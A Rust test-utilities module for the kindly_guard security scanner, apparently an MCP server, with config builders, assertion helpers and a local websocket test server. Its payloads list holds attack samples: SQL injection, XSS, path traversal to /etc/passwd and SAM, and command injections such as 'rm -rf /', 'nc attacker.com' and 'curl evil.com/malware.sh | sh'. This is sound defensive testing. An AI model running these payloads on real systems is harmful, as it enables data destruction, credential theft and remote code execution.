use kindly_guard_server::{Config, McpServer, ScannerConfig, SecurityScanner};
use std::sync::Arc;
pub fn test_scanner_config() -> ScannerConfig {
ScannerConfig {
unicode_detection: true,
injection_detection: true,
path_traversal_detection: true,
custom_patterns: None,
max_scan_depth: 10,
enable_event_buffer: false,
xss_detection: Some(true),
enhanced_mode: Some(false),
crypto_detection: true,
max_content_size: 10_485_760, allow_text_control_chars: false,
max_input_size: None,
}
}
pub fn default_scanner_config() -> ScannerConfig {
test_scanner_config()
}
pub fn create_test_scanner() -> Result<Arc<SecurityScanner>, Box<dyn std::error::Error>> {
let config = test_scanner_config();
Ok(Arc::new(SecurityScanner::new(config)?))
}
pub fn test_server_config() -> Config {
let mut config = Config::default();
config.server.stdio = true;
config.shield.enabled = false;
config.auth.enabled = false;
config.scanner = test_scanner_config();
config
}
pub fn create_test_server() -> Result<Arc<McpServer>, Box<dyn std::error::Error>> {
let config = test_server_config();
Ok(Arc::new(McpServer::new(config)?))
}
pub mod payloads {
pub const SQL_INJECTIONS: &[&str] = &[
"' OR '1'='1",
"'; DROP TABLE users; --",
"1' UNION SELECT * FROM passwords--",
"admin'--",
"' OR 1=1#",
];
pub const XSS_ATTACKS: &[&str] = &[
"<script>alert('xss')</script>",
"<img src=x onerror=alert('xss')>",
"javascript:alert('xss')",
"<svg/onload=alert('xss')>",
"<iframe src='javascript:alert(1)'></iframe>",
];
pub const UNICODE_ATTACKS: &[&str] = &[
"Hello\u{202E}World", "Test\u{200B}Hidden", "Normal\u{2060}Text", "\u{FEFF}BOM Attack", ];
pub const COMMAND_INJECTIONS: &[&str] = &[
"; rm -rf /",
"`whoami`",
"$(cat /etc/passwd)",
"| nc attacker.com 1234",
"&& curl evil.com/malware.sh | sh",
];
pub const PATH_TRAVERSALS: &[&str] = &[
"../../../etc/passwd",
"..\\..\\..\\windows\\system32\\config\\sam",
"....//....//....//etc/passwd",
"%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
];
}
pub mod assertions {
use kindly_guard_server::scanner::{Threat, ThreatType};
pub fn assert_contains_threat_type(threats: &[Threat], expected_type: &ThreatType) {
assert!(
threats.iter().any(|t| &t.threat_type == expected_type),
"Expected threat type {:?} not found in {:?}",
expected_type,
threats.iter().map(|t| &t.threat_type).collect::<Vec<_>>()
);
}
pub fn assert_minimum_severity(
threats: &[Threat],
min_severity: kindly_guard_server::scanner::Severity,
) {
for threat in threats {
assert!(
threat.severity >= min_severity,
"Threat {:?} has severity {:?}, expected at least {:?}",
threat.threat_type,
threat.severity,
min_severity
);
}
}
}
pub fn with_tokio_runtime<F, R>(f: F) -> R
where
F: FnOnce() -> R,
{
let rt = tokio::runtime::Runtime::new().unwrap();
let _guard = rt.enter();
f()
}
#[cfg(feature = "websocket")]
pub use self::websocket::{create_test_websocket_server, TestWebSocketServer};
#[cfg(feature = "websocket")]
pub mod websocket {
use axum::{
extract::ws::{WebSocket, WebSocketUpgrade},
response::Response,
routing::get,
Router,
};
use std::net::SocketAddr;
use std::sync::Arc;
use tokio::net::TcpListener;
use tokio::sync::Mutex;
pub struct TestWebSocketServer {
pub addr: SocketAddr,
pub shutdown_tx: tokio::sync::oneshot::Sender<()>,
pub handle: tokio::task::JoinHandle<()>,
}
impl TestWebSocketServer {
pub async fn new() -> Result<Self, Box<dyn std::error::Error>> {
Self::new_with_handler(|_ws| async {}).await
}
pub async fn new_with_handler<F, Fut>(
handler: F,
) -> Result<Self, Box<dyn std::error::Error>>
where
F: Fn(WebSocket) -> Fut + Send + Sync + 'static + Clone,
Fut: std::future::Future<Output = ()> + Send + 'static,
{
let listener = TcpListener::bind("127.0.0.1:0").await?;
let addr = listener.local_addr()?;
let (shutdown_tx, mut shutdown_rx) = tokio::sync::oneshot::channel();
let app = Router::new().route(
"/ws",
get(move |ws: WebSocketUpgrade| {
let handler = handler.clone();
async move { ws.on_upgrade(move |socket| handler(socket)) }
}),
);
let handle = tokio::spawn(async move {
let serve = axum::serve(listener, app);
tokio::select! {
_ = serve => {},
_ = &mut shutdown_rx => {},
}
});
tokio::time::sleep(tokio::time::Duration::from_millis(100)).await;
Ok(TestWebSocketServer {
addr,
shutdown_tx,
handle,
})
}
pub async fn shutdown(self) -> Result<(), Box<dyn std::error::Error>> {
let _ = self.shutdown_tx.send(());
self.handle.await?;
Ok(())
}
}
pub async fn create_test_websocket_server(
) -> Result<TestWebSocketServer, Box<dyn std::error::Error>> {
TestWebSocketServer::new().await
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_utilities_compile() {
let _config = test_scanner_config();
let _server_config = test_server_config();
assert_eq!(payloads::SQL_INJECTIONS.len(), 5);
}
}